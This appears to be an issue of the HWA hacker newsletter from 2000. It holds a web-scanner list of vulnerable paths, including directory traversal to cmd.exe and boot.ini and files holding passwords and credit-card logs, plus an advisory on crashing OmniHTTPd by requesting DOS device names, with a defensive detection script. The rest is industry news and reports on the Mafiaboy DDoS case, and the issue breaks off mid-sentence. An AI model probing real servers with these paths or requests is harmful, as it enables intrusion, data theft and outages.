/cgi-bin/rpm_query
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/architext_query.pl
/cgi-bin/w3-msql/
/cgi-bin/add_ftp.cgi
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/whois.cgi
/cgi-bin/mlog.phtml
/cgi-bin/archie
/cgi-bin/bb-hist.sh
/cgi-bin/nph-error.pl
/cgi-bin/post_query
/cgi-bin/ppdscgi.exe
/cgi-bin/webmap.cgi
/cgi-bin/tigvote.cgi
/cgi-bin/webutils.pl
/cgi-bin/axs.cgi
/cgi-bin/responder.cgi
/cgi-bin/plusmail
/cgi-bin/passwd.txt
/cgi-bin/Cgitest.exe
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/webwho.pl
/cgi-bin/search.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/search/tidfinder.cgi
/cgi-bin/wa
/cgi-bin/tablebuild.pl
/cgi-bin/displayTC.pl
/cgi-bin/uptime
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/c_download.cgi
/cgi-bin/download.cgi
/cgi-bin/program.pl
/cgi-bin/ntitar.pl
/cgi-bin/enter.cgi
/cgi-bin/test.html
/cgi-bin/test-unix.html
/cgi-bin/printenv
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/cgiback.cgi
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/gH.cgi
/cgi-bin/rwwwshell.pl
/cgi-bin/php
/cgi-bin/perl
/cgi-bin/wwwboard.cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/flexform.cgi
/cgi-bin/MachineInfo
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/LWGate
/cgi-bin/LWGate.cgi
/cgi-bin/nlog-smb.cgi
/cgi-bin/icat
/cgi-bin/tst.bat
/com1
/com2
/com3
/con
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin/fpcount.exe
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-win/uploader.exe
/cgi-shl/win-c-sample.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/scripts/no-such-file.pl
/scripts/counter.exe
/scripts/uploadn.asp
/scripts/convert.bas
/scripts/iisadmin/ism.dll
/scripts/tools/getdrvrs.exe
/scripts/tools/dsnform.exe
/scripts/samples/search/webhits.exe
/scripts/../../cmd.exe
/scripts/webbbs.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/cpshost.dll
/scripts/tools/getdrvs.exe
/scripts/pu3.pl
/scripts/proxy/w3proxy.dll
/WebShop/templates/cc.txt
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/config/orders.txt
/config/import.txt
/config/checks.txt
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/fileexist.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/iissamples/query.asp
/iissamples/exair/search/advsearch.asp
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/pw/storemgr.pw
/config/mountain.cfg
/orders/mountain.cfg
/quikstore.cfg
/PDG_Cart/shopper.conf
/search97.vts
/carbo.dll
/msadc/Samples/SELECTOR/showcode.asp
/adsamples/config/site.csc
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/doc
/doc Boa?? 8-)
/.html/............./config.sys
/ssi/envout.bat
/~root
/server%20logfile
/....../autoexec.bat
/perl/files.pl
/lpt
/AdvWorks/equipment/catalog_type.asp
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/admin.php3
/code.php3
/bb-dnbd/bb-hist.sh
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/secure/.htaccess
/secure/.wwwacl
/WebSTAR
/msadc/msadcs.dll
/?PageServices
/_AuthChangeUrl?
/........./autoexec.bat
/.html/............/autoexec.bat
/......../
/eatme.idc
/eatme.ida
/eatme.pl
/eatme.idq
/eatme.idw
/default.asp
/default.asp::$DATA
/default.asp.
/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
/samples/
/photoads/cgi-bin/env.cgi
/photoads/cgi-bin/
/photoads/
/session/admnlogin
/session/adminlogin?RCpage=/sysadmin/index.stm
/cfappman/index.cfm
/samples/search/queryhit.htm
/msadc/msadcs.dll
/publisher/|publisher
/PSUser/PSCOErrPage.htm
../../boot.ini
../..
/aux
/status
/log
@HWA
06.0 Project Gamma interviews SpaceRogue of HNN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Space Rogue
Date Published: March 12, 2000
Date Conducted: March 11, 2000
Interview Conducted By: WHiTe VaMPiRe
Interview Conducted With: Space Rogue
Space Rogue is the editor of the Hacker News Network, a member of
L0pht Heavy Industries (Now @Stake) -- he also previously maintained
the Whacked Mac Archives, one of the largest Macintosh
hacking-related sites on the Internet.
Questions are colored and Space Rogue's answers are indented.
How did you first get involved with computing?
    A door to door Osborne Salesperson came to my house. Showed us an
    Osborne One. While our family could not afford it $2,000+ that is
    where I started. I convinced him to come back several times on the
    premise of maybe we will buy it. In those few hours I learned a lot.
What would you consider your first computer?
    Commodore 64.
What projects were you involved with before the L0pht?
    Nothing anyone would know about.
How did you get involved with the L0pht?
    I knew most of the other founders for years via local bulletin board
    systems.
What are your feelings on the merger of the L0pht and @Stake?
    A good thing in general, it allows time and resources to be devoted
    to important projects that would never have been possible before.
What initially brought you to create the Hacker News Network?
    I was sharing URLs with a small group of people and decided that it
    would be better to put them on the web and share them with a larger
    audience.
Many have noticed that after the L0pht / @Stake merger the commercial
content was removed from HNN. How else will the merger affect HNN?
    @Stake is committed to vendor neutrality which is why all
    advertisements were removed. You will also notice the removal of
    the HNN Store and no more T-shirt sales. In the future you can
    expect even more changes including even the name of the site as it
    gets integrated into the @Stake corporate web presence.
What do you have planned for HNN's future?
    HNN's future is pretty much out of my hands at the moment.
Do you have any comments on the media's interpretation of "hackers,"
"crackers," and the related communities?
    This is an ongoing battle sometimes I think we are winning, and
    other times I think we have failed miserably. There are some
    journalists out there who actually 'get it' but many many others
    need to be educated.
Do you think the media has at all improved with its coverage of 'hacking'
related topics in the past few years?
    Well they have given it more coverage, not sure if that qualifies as
    an improvement though. This is especially evident during fast moving
    critical stories such as the recent DDoS attacks. Some news outlets
    got it right but many more got it wrong.
How do you think they could improve their coverage and cut down the FUD
(Fear, Uncertainty, and Doubt)?
    Education. Unfortunately many reporters have little to no
    understanding of technology.
Why was the name of Project BootyCall changed to TBA?
    No comment.
What is your opinion on Web site defacements?
    Most are childish and serve no purpose. You would think that people
    who are taking such an immense risk of going to jail would have
    something better to say than 'Props to my peeps.'
The Hacker News Network is accessible at http://www.hackernews.com/.
Space Rogue can be contacted via spacerog@l0pht.com.
@HWA
07.0 MS Engineers plant secret anti-Netscape password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by MerXor
MS admits planting secret password
Microsoft engineers placed a password in
server software that could be used to gain
illicit access to hundreds of thousands of
Internet sites worldwide.
By Ted Bridis, WSJ Interactive Edition
April 14, 2000 4:34 AM PT
Microsoft Corp. acknowledged Thursday that its
engineers included in some of its Internet software a
secret password -- a phrase deriding their rivals at
Netscape as "weenies" -- that could be used to gain
illicit access to hundreds of thousands of Internet
sites worldwide.
The manager of Microsoft's security-response center,
Steve Lipner, acknowledged the online-security risk in an
interview Thursday and described such a backdoor
password as "absolutely against our policy" and a firing
offense for the as-yet-unidentified employees.
The company planned to warn customers as soon as
possible with an e-mail bulletin and an advisory published
on its corporate Web site. Microsoft (Nasdaq: MSFT)
urged customers to delete the computer file--called
"dvwssr.dll"--containing the offending code. The file is
installed on the company's Internet-server software with
Frontpage 98 extensions.
While there are no reports that the alleged security flaw
has been exploited, the affected software is believed to be
used by many Web sites. By using the so-called back
door, a hacker may be able to gain access to key
Web-site management files, which could in turn provide a
road map to such things as customer credit-card
numbers, said security experts who discovered the
password.
Two security experts discovered the rogue computer code
-- part of which was the denigrating comment "Netscape
engineers are weenies!" -- buried within the 3-year-old
piece of software. It was apparently written by a Microsoft
employee near the peak of the hard-fought wars between
Netscape Communications Corp. and Microsoft over their
versions of Internet-browser software. Netscape later was
acquired by America Online Inc.
One of the experts who helped identify the file is a
professional security consultant known widely among the
Internet underground as "Rain Forest Puppy." Despite his
unusual moniker, he is highly regarded by experts and
helped publicize a serious flaw in Microsoft's
Internet-server software last summer that put hundreds of
high-profile Web sites at risk of intrusion.
Almost every Web-hosting provider
Russ Cooper, who runs the popular NT Bugtraq
discussion forum on the Internet, estimated that the
problem threatened "almost every Web-hosting provider."
"It's a serious flaw," Cooper said. "Chances are, you're going to find
some major sites that still have it enabled."
Lipner of Microsoft said the company will warn the nation's largest
Web-site providers directly.
In an e-mail to Microsoft earlier Thursday, Rain Forest
Puppy complained that the affected code threatened to
"improve a hacker's experience." Experts said the risk
was greatest at commercial Internet-hosting providers,
which maintain hundreds or thousands of separate Web
sites for different organizations.
Lipner said the problem doesn't affect Internet servers
running Windows 2000 or the latest version of its server
extensions included in Frontpage 2000.
The digital gaffe initially was discovered by a Europe-based employee of
ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells
e-commerce technology. The company declined to comment because
of its coming stock sale. The other expert, Rain Forest
Puppy, said he was tipped off to the code by a
ClientLogic employee.
When asked about the hidden insult Thursday, Jon
Mittelhauser, one of Netscape's original engineers, called
it "classic engineer rivalry."
@HWA
08.0 b0f:Omni HTTPD Pro v2.06 for Win9x and NT DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Main site/home page is http://b0f.freeBSD.lublin.pl/ and is run by
Venglin of b0f.
(NOTE: www.b0f.com, is the old site and that site may be phased out in
the future.- Ed)
-=-
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: Omni HTTPD Pro v2.06 for Win9x and NT DoS
Date: 12/4/00
Application: Omni HTTPD Pro v2.06 (probably others?)
Vendor: Omnicron Technologies Corporation
WWW: http://www.omnicron.ab.ca
Severity: Any user can simply crash a remote server with the OmniHTTP
daemon installed
Author: sirius ( sirius@linuxfan.com )
Homepage: www.b0f.com
* Overview
Quote from Omnicron Technologies Web site:
"OmniHTTPd is a powerful all-purpose industry compliant web server built
specifically for the Windows 95/98/NT4 platform. In addition to
Standard CGI support, the server sports advanced features such as
Keep-Alive connections, table auto-indexing and server-side includes. For
maximum performance, OmniHTTPd is both 32-bit and multi-threaded. Many
users agree that OmniHTTPd is the fastest and most compact web server
available for the Windows platform ..."
* The Problem
It is possible to crash OmniHTTPd Pro v2.06 (maybe other versions)
because it parses the path strings to call some FAT32/VFAT routines
in the kernel, which makes your system unstable and useless until the next
reboot.
If you request the following directories:
/com1,/com2,/com3,/aux,/lpt1,/lpt2,/clock$,/config$,/nul (and maybe others
but not /con)
the web server accepts the connection.
e.g. if you request the /com3 directory on a remote server and it has a modem
device installed on COM port 3, it will crash the connection of the remote
server and you will have to reboot the machine.
If the server has devices installed on its COM ports and a remote user requests
a directory whose name matches the name of a device driver (e.g.
/aux), it will crash that device ... if you succeed you will get error 403
: forbidden error.
* Vulnerable Versions
- OmniHttpd version 2.06 Pro under Win98, NT not tested - maybe
other earlier versions
* Fix
Unknown for now, I mailed Omnicron Technologies ... they will probably fix
this bug in next version.
* Additional information:
Well, I played with this thing and went to SecurityFocus.com to check for
this bug and I found securax security advisory 01 with some general
information about this bug, so if you need more information read that
advisory at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-1&thread=4.2.0.58.20000306111151.00992c60@urc1.cc.kuleuven.ac.be
copyright © 1999-2000 sirius,
buffer0verfl0w security www.b0f.com
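A server-side check for the condition this advisory describes, as an added example that is not part of the b0f advisory or of OmniHTTPd: it rejects any request path with a segment that resolves to a DOS device name, and flags such requests in an access log. The function names, the Common Log Format input and the sample log lines are assumptions constructed for the example; the name set widens the advisory's list to the full set Windows reserves.

```python
"""Reject or flag request paths that name a DOS/Windows device (added example)."""
import re
from urllib.parse import unquote

# Names from the advisory (com1-3, aux, lpt1-2, clock$, config$, nul, con),
# widened to everything Windows reserves: CON, PRN, AUX, NUL, COM1-9, LPT1-9.
RESERVED = {"CON", "PRN", "AUX", "NUL", "CLOCK$", "CONFIG$"}
RESERVED |= {f"COM{i}" for i in range(1, 10)} | {f"LPT{i}" for i in range(1, 10)}


def _decode(path, rounds=3):
    """Percent-decode repeatedly so a double-encoded name (%2561ux) is still caught."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def reserved_segment(raw_path):
    """Return the first path segment that resolves to a device name, else None."""
    # Drop the query string first: only the path is mapped onto the filesystem.
    path = _decode(raw_path.split("?", 1)[0])
    for segment in re.split(r"[/\\]+", path):
        # Conservative match: trailing dots/spaces are ignored and anything
        # after the first dot or colon is dropped, so "aux.gif", "COM1:" and
        # "nul ." all count as the device itself.
        base = re.split(r"[.:]", segment.rstrip(" ."), maxsplit=1)[0].strip().upper()
        if base in RESERVED:
            return segment
    return None


# Common Log Format: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (client, path, status) for every request naming a reserved device."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and reserved_segment(m.group("path")):
            hits.append((m.group("client"), m.group("path"), int(m.group("status"))))
    return hits


# Constructed sample lines; addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2000:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.7 - - [12/Apr/2000:10:00:05 +0000] "GET /com3 HTTP/1.0" 403 0',
    '198.51.100.7 - - [12/Apr/2000:10:00:06 +0000] "GET /images/%61ux.gif HTTP/1.0" 403 0',
    '192.0.2.10 - - [12/Apr/2000:10:00:09 +0000] "GET /docs/console.html HTTP/1.0" 200 512',
    '203.0.113.5 - - [12/Apr/2000:10:00:11 +0000] "GET /cgi-bin/..%5Clpt1 HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for client, path, status in scan_access_log(SAMPLE_LOG):
        print(f"{client} requested device path {path!r} (status {status})")
```

A front end would call reserved_segment() before the path reaches any filesystem API and answer with an error without opening the name; the log scan finds the same requests after the fact.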
@HWA
09.0 Judge bans Mitnick from taking part in tech conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://deseretnews.com/dn/view/0,1249,160008642,00.html?
Federal judge bans convicted hacker from taking part in tech conference
A federal judge Monday banned convicted computer hacker Kevin Mitnick
from taking part in a technology conference in Salt Lake City Wednesday.
Mitnick, who gained notoriety for his hacking exploits and spent several
years in a federal prison in Lompoc, Calif., won't be sitting on a
computer security panel discussion at the Utah Information Technologies
Association conference at the Salt Palace Convention Center. The judge
kiboshed the appearance because Mitnick's prison release agreement
prohibits him from "consulting or advising" on the topic of
computer-related activity.
Monday, Mitnick did an extended interview promoting the panel discussion
on KSL's Doug Wright Show, where he answered callers' questions about
computer security and told the story of his hacking exploits. He
hacked for fun, he said, and never made any money from it.
Richard Nelson, president of UITA, said Mitnick's public relations
representative had indicated that Mitnick had permission to appear from
the U.S. probation office in California. A few days ago, the
organization learned he might not be able to leave California.
Conference organizers are in the process of arranging a replacement for
Mitnick on the cyber-security panel. They are planning on bringing in a
senior staffer from a large company that deals with cyber security.
Nelson said he's sorry Mitnick can't participate. "He's eager to talk and
disappointed he can't come. If you listened (to him on the radio show),
he recognizes he made serious mistakes and he wanted to go forward.
"We're not trying to promote his career, but if he can help information
technology companies in Utah and decision makers dealing with security
issues determine what level of risk they want to take, that's good.
There will always be risk, but you can reduce it by taking security
measures." The UITA conference, "Net Trends 2000: The Digital Revolution"
takes place Wednesday and Thursday.
@HWA
10.0 The continuing saga of MAFIABOY king lemur of DDoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.usatoday.com/usatonline/20000421/2187297s.htm
Hacker's friends may be suspects in cyberattacks
By Kevin Johnson
USA TODAY
WASHINGTON -- Authorities investigating the February attacks on
some of the most popular Internet sites are focusing on three close friends
of the 15-year-old Canadian boy who was charged earlier this week, a
senior U.S. law enforcement official said Thursday.
The three friends of the Montreal computer hacker known as "Mafiaboy"
are among several potential suspects identified by authorities in the
cyberassaults that temporarily shut down the Web sites of CNN, Yahoo,
Amazon.com and several other media and commercial giants.
Beyond Montreal, authorities are examining the activities of a small group
of hackers thought to be based in Israel. Officials there say the group has
been involved in various online financial crimes, some involving stolen
credit card numbers.
The group is believed to be part of a larger circle of computer users,
including Mafiaboy, who have spent time in an Internet chat room called
TNT. The chat room is accessible only by password.
Investigators also are trying to determine whether Dennis Moran, a
17-year-old New Hampshire hacker known online as "Coolio," was
involved in the attacks in February.
Moran, who authorities say has boasted of being involved in the attacks,
was charged last month in an attack on a Web site run by the Los Angeles
Police Department.
The unidentified Montreal teenager known as Mafiaboy has been charged
only in two attacks against CNN.com, which was shut down for 3 1/2
hours Feb. 8 after it was overloaded with requests.
Mafiaboy claimed credit in chat rooms for similar assaults on sites run by
Yahoo and Buy.com. Officials believe Mafiaboy may have been capable
of directing all the assaults but doubt that he did.
Analysts familiar with the assaults say the software used to wall off access
to the CNN Web site on Feb. 8 was different and less sophisticated than
that used to paralyze Yahoo on Feb. 7.
Michael Lyle, who runs a software security firm in Palo Alto, Calif., said
the attack on CNN involved software commonly found on Internet sites
for hackers.
"I literally could show you how to do it in three or four hours," he said.
The goal is to flood Internet sites with tens of thousands of requests,
disguising the source of the assault by routing the requests through
high-capacity computers elsewhere. The tactic overloads the targeted
Web sites, causing electronic paralysis.
Investigators say Mafiaboy orchestrated the attack on CNN.com through
computers at the University of California-Santa Barbara.
A Canadian law enforcement official said that because of Mafiaboy's age,
it is unlikely he would be sent to an adult prison if convicted of "mischief to
data."
If prosecuted and convicted as an adult, the teenager could face up to 20
years in prison. But in Canada's juvenile system, he faces a maximum of
two years in a youth detention center if convicted.
@HWA
10.1 Mafiaboy reaction: "yeah right"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/print/0,1294,35785,00.html
Mafiaboy Reaction: 'Yeah, Right'
by Leander Kahney
2:20 p.m. Apr. 19, 2000 PDT
The hacking community is skeptical that the Canadian Royal Mounted Police
have nabbed the perpetrator of February's highly publicized denial of
service attacks.
Following news that the Mounties charged a Montreal juvenile in the
attacks, hackers are demanding evidence that the 15-year-old known by the
alias "Mafiaboy" was indeed involved.
"I'm highly skeptical," said B.K. DeLong, a member of Attrition.org, an
Internet security group that monitors and archives website cracks and
defacement.
"I don't think they've found the person who did the attacks. I think law
enforcement is stalling the press and public to keep them off their backs
while they find the real person," DeLong said.
DeLong said his skepticism was based on what appears to be a paucity of
evidence linking "Mafiaboy" to the attacks. According to initial reports,
the RCMP found computer logs and the transcript of an online chat group
that led them to file the charges against the teen, whose real
identity is shielded by Canadian law.
DeLong said law enforcement had already blundered in the case with the
arrest of Coolio, a.k.a. Dennis Moran, who was detained by New Hampshire
police in March in relation to the attacks, but later was charged with the
unrelated defacement of a Los Angeles Police Department anti-drug
site.
DeLong also noted that denial of service attacks are notoriously difficult
to investigate and there has been a suspiciously long delay between the
attacks and the charges.
"I think they should show some definite evidence how they got this guy,"
said Scully, editor of Cipherwar, a technology and politics site. "Chat
list logs are not enough."
Scully said that law enforcement agencies have a poor record of finding
and charging cyber-criminals, as evidenced by the four years notorious
computer hacker Kevin Mitnick was incarcerated awaiting trial.
This is the second time "Mafiaboy" has been linked to the attacks.
Mafiaboy -- whoever that may be -- first was tabbed as a potential
perpetrator of the attacks by an Internet security firm about a week after
they occurred.
Even then, hackers expressed their doubts Mafiaboy was involved.
"I seriously doubt that this guy is an actual suspect," Space Rogue,
editor of the Hackers News Network, told Wired News at the time. "Maybe he
did it, but the information I have doesn't point to that at all."
10.2 Mafiaboy's dad gets busted for conspiracy to DDoS a business associate's head
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I kid you not, I suppose his mum will be up on solicitation charges next...
-Ed
http://www.wired.com/news/print/0,1294,35836,00.html
Like Mafia Son, Like Mafia Dad
Wired News Report
10:45 a.m. Apr. 21, 2000 PDT
Mafiaboy didn't fall far from the tree, it seems.
Turns out the Canadian police tapped into some rather incriminating
telephone calls placed by the 15-year-old cracker's dad, who allegedly
took out a contract on a business colleague.
Lieutenant Lenny Lechman said Mafiaboy's 45-year-old father was arrested
last week and charged with conspiring to commit bodily harm.
"We felt that before somebody gets hurt really badly, we had to intervene
as quickly as possible," Lechman said.
Mafiaboy was charged earlier this week with two counts of mischief for a
Feb. 8 denial-of-service attack on CNN.com. He was fingered as a suspect
back in February by Michael Lyle, chief technical officer of
Internet-security firm Recourse Technologies Inc.
Mafiaboy's dad, whose real name is John Calce, was released on bail
Monday.
Mafiaboy himself has also been released, with a Kevin Mitnickian-like
stipulation that he stay away from computers.
Canadian police said they are still analyzing data found on the alleged
cracker's seized computers.
@HWA
10.3 On another mafiaboy note, a new site has popped up on Geocities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.geocities.com/freemafiaboy/
gullible adj 1: easily deceived or tricked ; synonymous with Michael Lyle
Michael Lyle is considered to be a computer security expert....
He is cofounder and Chief Technology Officer of Recourse Technologies in
sunny Palo Alto California, which sells anti-hacker software programs.
Also, he used to work for Exodus Communications, which experienced an
embarrassing hacker break-in while he was employed there, and admits
that he himself used to be a hacker. He goes by the nickname Icee on IRC.
He told ABC he had communicated with Mafiaboy on IRC, and the 15-year-old
said he had attacked not only CNN.com but also E+Trade. There is now
definitive proof that he was NOT talking with whom he believed was mafiaboy.
Mafiaboy is a 15 year old Canadian.
He was arrested on April 15 and charged with two counts of mischief to data
for the attack that jammed up to 1,200 CNN-hosted Web sites for four hours
Feb. 8.
This website documents the extreme carelessness Michael Lyle showed in his
"investigation" of the DDoS attacks that recently plagued CNN, Yahoo, Amazon,
and E-trade. He is quoted in multiple news articles saying that he had
conversations on IRC with "mafiaboy", who he claims admitted to the attacks
on CNN and E-trade. The methods he used to ascertain that this was the
real "mafiaboy" or if "mafiaboy" actually launched any of these attacks were
extremely inefficient. This website contains concrete proof (from 2600.com)
that on at least one occasion he was not talking to who he believed was
mafiaboy. He later cited information from that same conversation in an
interview with ABC. The General Public should not be constantly under
these misconceptions the media is providing. Upon reading the IRC logs
from 2600.com you will certainly question how gullible Michael Lyle is.
Maybe he was just too focused on the fact of catching the perpetrator of
these "hacker" crimes, so he could claim fame to himself and his company
Recourse Technologies.... and get rich in the process.
Is Mafiaboy real or a creation of the media? 04/20/00
This is the link to the IRC logs which show Michael's conversation with
whom he believed was mafiaboy. Icee is Michael Lyle, while "[mafiaboy]"
is someone from 2600 staff posing as him. This is an extremely hilarious
conversation when you take into account the fact that this is all a joke played
on the "security expert" Michael Lyle.
Below are various news stories I found online about mafiaboy.
Probe of Hacker Nets a Second Suspect: His Father 04/21/2000 NEW INFO IN THIS ARTICLE
The Challenge of Fighting Cybercrime ....04.20.00
Janet Reno licks chops over Mafiaboy arrest 04/20/2000 5:11pm
Canadian Teen Charged in Web Blitz Thursday, April 20, 2000
Canada Arrests 'Mafiaboy' Hacker, Aged 15 Apr 19 2000 7:49PM ET
Canadian Arrest Made in February Web Attacks 04/19/2000 10:10:00 ET
Reno Says 'Mafiaboy' Hacker Must Face Punishment Apr 19 2000 11:04AM ET
"Mafiaboy" Suspected Feb. 16 This is pretty old.. but has some of the initial info.
I have absolutely no idea whether or not mafiaboy is the same person as
the Canadian teen arrested or if mafiaboy is even the individual
responsible for the crimes. I have never conversed with anyone named
mafiaboy and have no idea who he is.
Comments can be e-mailed to Taelon@mail.com
@HWA
10.4 Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html
Probe of Hacker Nets a Second Suspect: His Father
By Steven Pearlstein and David A. Vise
Washington Post Staff Writers
Friday , April 21, 2000 ; A01
ILE-BIZARD, Quebec -- There may be more to the computer moniker "Mafiaboy"
than first believed.
Montreal police said today that they moved in on the 15-year-old hacker
last weekend after learning from wiretaps that his father had taken out a
contract to harm or frighten a business associate and that the
attack was imminent. They had wiretapped the boy's house shortly after
U.S. and Canadian investigators identified that someone who lived there
had launched a disabling computer attack that had shut down CNN's Web
site and possibly other big sites in February.
"We didn't think we could wait any longer," a Canadian police official
said.
Mafiaboy had bragged in online chats and to friends that he had taken down
CNN.com, Amazon.com, Buy.com, eBay and E-Trade, but they didn't believe
him. Federal law enforcement officials in Canada and the United
States took note, however, following up on tips and tracing the
electronic path that led to Mafiaboy's neighborhood in the West Island
section of Montreal, sources familiar with the probe said.
The wiretaps were intended to pick up evidence against the boy and leads
about possible collaborators. Inadvertently, however, a police official
said they also picked up phone conversations from the boy's
45-year-old father, president of a transportation company, as he conspired
with a hit man about harming or scaring a business associate.
Police moved in on both father and son at 3 a.m. Saturday at their home,
charging the son with two counts of "mischief" with data and the father
with two counts of conspiracy to cause bodily harm.
The father, John Calce, was released Monday on $2,000 (U.S.) bail and
ordered not to get within 300 yards of the house or office of the man he
had allegedly targeted.
The boy was also released from detention on the condition that he not
associate with his three closest friends. Canadian law enforcement
officials said yesterday they wanted to prevent Mafiaboy from
using computers belonging to his friends and also did not want him
to attempt to silence his friends, who could be witnesses against him in
the case.
The Royal Canadian Mounted Police, which is handling the investigation of
Mafiaboy's computer hacking, indicated today it expects further charges
will be brought against the boy once they have had a chance to
review all of the evidence and the weeks of wiretaps on the house.
U.S. and Canadian authorities also expect to charge others who may or may
not have collaborated with the Montreal boy, whom police described
as a somewhat amateurish hacker.
There are no indications that the boy is cooperating with the
investigation, and his attorney said yesterday that he intends to shift
the focus from his client to the Web sites that should have
better protected themselves against computer vandalism.
"We can already foresee a long, complex and very technical trial which
will certainly shed light on how a 15-year-old could have done what he is
accused of, to a multinational corporation which almost
certainly could have been expected to be equipped with the most
sophisticated and up-to-date security systems," said lawyer Yan
Romanowski.
The Riverdale High School student with the Mafiaboy screen name struggled
in classes and was transferred to Riverdale this year after being
suspended repeatedly from another school closer to his home,
classmates and law enforcement officials confirmed today. They said
he excelled in one course: computers.
Known as a computer whiz but a constant discipline problem--he had been
suspended from Riverdale twice this year--he frequently talked back to his
English and math teachers, banging his desk and rarely showing up
for class with books and completed homework, according to friends
and classmates who gathered for hot dogs today at La Belle Province, one
block from the campus.
The friends, all of whom declined to give their names, said Mafiaboy had
been bragging about his hacking exploits for the past several weeks.
"I didn't believe him," said one. "He was a bit of a showoff."
"He had a real attitude," said another as he waited for the No. 205 bus
after school. "He wanted to graduate someday, but he knew he had
problems."
Mafiaboy was described by his classmates as bright, engaging, outgoing and
loyal to his friends. He hung out generally with the tough guys and was
known to smoke cigarettes. In dress, he favors baggy pants, a
loose-fitting yellow jacket and Nike T-shirts and shoes.
"He likes to chill the girls after school," said one student having a
cigarette at "The Pit," the unofficial smoking area just outside the
school fence, at lunch time. Although he is said to have had one
or two girlfriends over the years, he does not have one now,
classmates said.
The 5-foot-11 youth played guard in a Saturday afternoon basketball league
on a team called the Brookwood Jazz. He may have more time to shoot hoops
in the weeks ahead, since conditions of his release forbid him
from using the Internet, entering a business with computers or going into
a computer store. He is only allowed to use computers at school under the
strict supervision of teachers and even then, is not allowed to
access the Internet. Canadian police are examining the computers seized
from the boy's house in the Saturday morning raid.
Although he was in biology class yesterday when police announced details
of his weekend arrest, he was reportedly not in school today, on the eve
of a five-day Easter recess in Montreal-area schools.
Riverdale is an ethnically and economically mixed high school in a largely
English-speaking neighborhood, with about 1,200 students. More than half
its students go on to community college or university. Students
are required to wear uniforms.
Mafiaboy lives about a 12-minute drive from the school in a new
development of large brick and stone mini-mansions arrayed around the new
St. Raphael Golf Course.
Yesterday, a "for sale" sign was visible on the lawn of the family's
